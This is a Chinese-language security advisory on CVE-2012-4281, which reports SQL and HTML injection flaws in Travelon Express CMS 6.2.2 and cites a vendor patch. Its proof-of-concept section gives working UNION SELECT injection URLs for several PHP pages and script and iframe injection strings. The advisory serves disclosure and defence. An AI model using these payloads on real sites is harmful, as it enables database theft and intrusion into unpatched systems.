安全研究
安全漏洞
Travelon Express CMS多个远程漏洞(CVE-2012-4281)
发布日期:2012-05-13
更新日期:2012-05-13
受影响系统:itechscripts Travelon Express 6.2.2
描述:
BUGTRAQ ID:
53500
CVE ID:
CVE-2012-4281
Travelon Express是专为全球旅行业创建的独特产品,用PHP/ MySQL编码,可自由定制。
Travelon Express 6.2.2在实现上存在多个SQL注入漏洞,通过传递到holiday.php、holiday_book.php的hid参数,传递到pages.php的id参数,传递到admin/airline-edit.php的fid参数、传递到admin/customer-edit.php的cid参数,远程攻击者可利用此漏洞执行任意SQL命令。
<*来源:the_storm
链接:
http://www.exploit-db.com/exploits/18871/
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2012-4281
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
the_storm ()提供了如下测试方法:
SQL Injection
PoC:
http://www.example.com/holiday.php?hid=2[-2+union+select+1,2,3,group_concat(table_name),5,6,7,8+from+information_schema.tables+where+table_schema=database()--%20-]
http://www.example.com/pages.php?id=1[-2+union+select+1,2,3,group_concat(table_name),5,6,7,8+from+information_schema.tables+where+table_schema=database()--%20-]
http://www.example.com/holiday_book.php?hid=1[-2+union+select+1,2,3,group_concat(table_name),5,6,7,8+from+information_schema.tables+where+table_schema=database()--%20-]
http://www.example.com/admin/airline-edit.php?fid=1[-2+union+select+1,2,3,group_concat(table_name),5,6,7,8+from+information_schema.tables+where+table_schema=database()--%20-]
http://www.example.com/admin/customer-edit.php?cid=1[-2+union+select+1,2,3,group_concat(table_name),5,6,7,8+from+information_schema.tables+where+table_schema=database()--%20-]
HTML Injection
PoC:
http://www.example.com/admin/holiday_add.php - holiday name
http://www.example.com/admin/holiday_view.php- holiday name
holiday name => Insert the following test strings & save the input ...
>.<ScriPt>ALeRt("VlAb")</scriPt>
>"<IfRaMe sRc=
hTtp://vulnerability-lab.com></IfRaMe>
Reference(s):
http://travelon.xxx.com/upload/holiday/hi9223test.php建议:
厂商补丁:
itechscripts
------------
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
http://itechscripts.com/proman_xpress.html浏览次数:1986
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载 绿盟科技给您安全的保障 |